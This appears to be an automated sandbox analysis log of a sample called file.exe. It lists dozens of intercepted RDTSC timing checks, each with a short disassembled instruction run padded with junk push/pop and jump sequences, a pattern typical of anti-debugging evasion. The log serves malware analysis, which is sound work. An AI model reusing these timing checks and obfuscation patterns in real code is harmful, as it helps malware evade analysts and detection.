                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D508 second address: 140D588 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F8F34B47B58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 call 00007F8F34B47B64h 0x0000002d mov dword ptr [ebp+122D1C4Eh], eax 0x00000033 pop ebx 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov dword ptr [ebp+1245DEBEh], eax 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, 0D853114h 0x0000004d mov di, bx 0x00000050 mov eax, dword ptr [ebp+122D0939h] 0x00000056 mov ebx, dword ptr [ebp+122D38BFh] 0x0000005c push FFFFFFFFh 0x0000005e sub bx, 2611h 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push edx 0x00000068 pop edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14123E7 second address: 14123EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBAF1 second address: 13BBAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBAF7 second address: 13BBAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412A29 second address: 1412A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F8F34B47B5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jnc 00007F8F34B47B67h 0x00000014 jnp 00007F8F34B47B5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14139CF second address: 14139D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412B92 second address: 1412B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412C40 second address: 1412C66 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F347F9F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8F347F9F28h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1413BCD second address: 1413C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8F34B47B58h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D356Bh] 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jmp 00007F8F34B47B64h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push edi 0x00000041 jmp 00007F8F34B47B62h 0x00000046 pop ebx 0x00000047 mov eax, dword ptr [ebp+122D16B1h] 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F8F34B47B58h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F8F34B47B56h 0x0000006d sub edi, 5673363Dh 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F8F34B47B61h 0x0000007a nop 0x0000007b push eax 0x0000007c push edx 0x0000007d jl 00007F8F34B47B5Ch 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1413C98 second address: 1413C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1413C9E second address: 1413CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417923 second address: 141792D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F347F9F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141792D second address: 141793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F8F34B47B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141793B second address: 141795E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8F347F9F1Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141795E second address: 1417963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417963 second address: 1417968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1417968 second address: 141796E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419DAB second address: 1419DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419DAF second address: 1419DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419DB3 second address: 1419DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419DB9 second address: 1419DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419E62 second address: 1419E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414A9E second address: 1414AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1418194 second address: 141819F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414AA4 second address: 1414AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414AA8 second address: 1414AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414AAC second address: 1414ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jnp 00007F8F34B47B5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AD2B second address: 141AD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141A09B second address: 141A09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141A09F second address: 141A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F719 second address: 141F71D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141F71D second address: 141F733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F20h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142318C second address: 1423190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1423190 second address: 14231A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8F347F9F1Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14231A9 second address: 14231B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14231B0 second address: 14231BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F8F347F9F16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CC489 second address: 13CC48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CC48D second address: 13CC4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8F347F9F1Ch 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jc 00007F8F347F9F16h 0x00000015 jc 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CC4B0 second address: 13CC4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1426C0B second address: 1426C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F29h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1427089 second address: 142708F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142C1BF second address: 142C1C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142C1C5 second address: 142C249 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B65h 0x00000008 jmp 00007F8F34B47B5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F8F34B47B64h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F8F34B47B66h 0x0000001f pushad 0x00000020 jmp 00007F8F34B47B66h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b pushad 0x0000002c jmp 00007F8F34B47B69h 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431A10 second address: 1431A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8F347F9F16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431A1C second address: 1431A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431A20 second address: 1431A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431A2C second address: 1431A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8F34B47B69h 0x00000010 jmp 00007F8F34B47B63h 0x00000015 jmp 00007F8F34B47B5Dh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431D19 second address: 1431D30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F1Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1432136 second address: 143215E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8F34B47B56h 0x00000008 jmp 00007F8F34B47B64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F8F34B47B56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143215E second address: 1432162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436931 second address: 1436966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B65h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F8F34B47B61h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436966 second address: 143696C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143696C second address: 1436970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436970 second address: 1436974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143575E second address: 1435765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1435765 second address: 143576A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143576A second address: 1435772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140119A second address: 13E7F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F8F347F9F23h 0x0000000d nop 0x0000000e call 00007F8F347F9F1Dh 0x00000013 call 00007F8F347F9F27h 0x00000018 jmp 00007F8F347F9F25h 0x0000001d pop edi 0x0000001e pop ecx 0x0000001f lea eax, dword ptr [ebp+12482F5Bh] 0x00000025 push ecx 0x00000026 adc di, 1B1Dh 0x0000002b pop ecx 0x0000002c push eax 0x0000002d jmp 00007F8F347F9F1Bh 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F8F347F9F18h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D18EDh] 0x00000055 call dword ptr [ebp+122D1BBEh] 0x0000005b pushad 0x0000005c jng 00007F8F347F9F1Eh 0x00000062 js 00007F8F347F9F16h 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401713 second address: 1401717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401717 second address: 1401734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F1Dh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401734 second address: 1401738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401738 second address: 140175D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d jp 00007F8F347F9F1Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140175D second address: 140177D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jc 00007F8F34B47B6Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8F34B47B5Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140177D second address: 1401794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add cx, CE5Fh 0x0000000c push 25342E72h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14018E7 second address: 14018ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14018ED second address: 14018F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401947 second address: 1401989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F34B47B69h 0x0000000b popad 0x0000000c mov dword ptr [esp], esi 0x0000000f xor cl, 00000050h 0x00000012 nop 0x00000013 push ecx 0x00000014 pushad 0x00000015 jns 00007F8F34B47B56h 0x0000001b jmp 00007F8F34B47B5Bh 0x00000020 popad 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401989 second address: 140198D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1401B56 second address: 1401B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jnc 00007F8F34B47B56h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8F34B47B5Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14021D5 second address: 14021DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14024BE second address: 14024C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14024C3 second address: 14024D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14024D0 second address: 14024D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14024D4 second address: 13E8AD7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 cmc 0x00000009 call dword ptr [ebp+122D2504h] 0x0000000f pushad 0x00000010 push eax 0x00000011 jne 00007F8F347F9F16h 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8F347F9F1Eh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8AD7 second address: 13E8ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E8ADD second address: 13E8AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1435A12 second address: 1435A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1435A27 second address: 1435A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1435A2B second address: 1435A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8F34B47B60h 0x0000000c jng 00007F8F34B47B56h 0x00000012 jp 00007F8F34B47B56h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F8F34B47B68h 0x00000022 jmp 00007F8F34B47B62h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436329 second address: 1436334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8F347F9F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436334 second address: 1436350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B61h 0x00000007 pushad 0x00000008 js 00007F8F34B47B56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143D94E second address: 143D958 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F347F9F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14429A8 second address: 14429B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14429B6 second address: 14429BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1443040 second address: 1443069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F8F34B47B56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8F34B47B66h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1443069 second address: 1443096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8F347F9F24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8F347F9F1Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1443096 second address: 144309A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
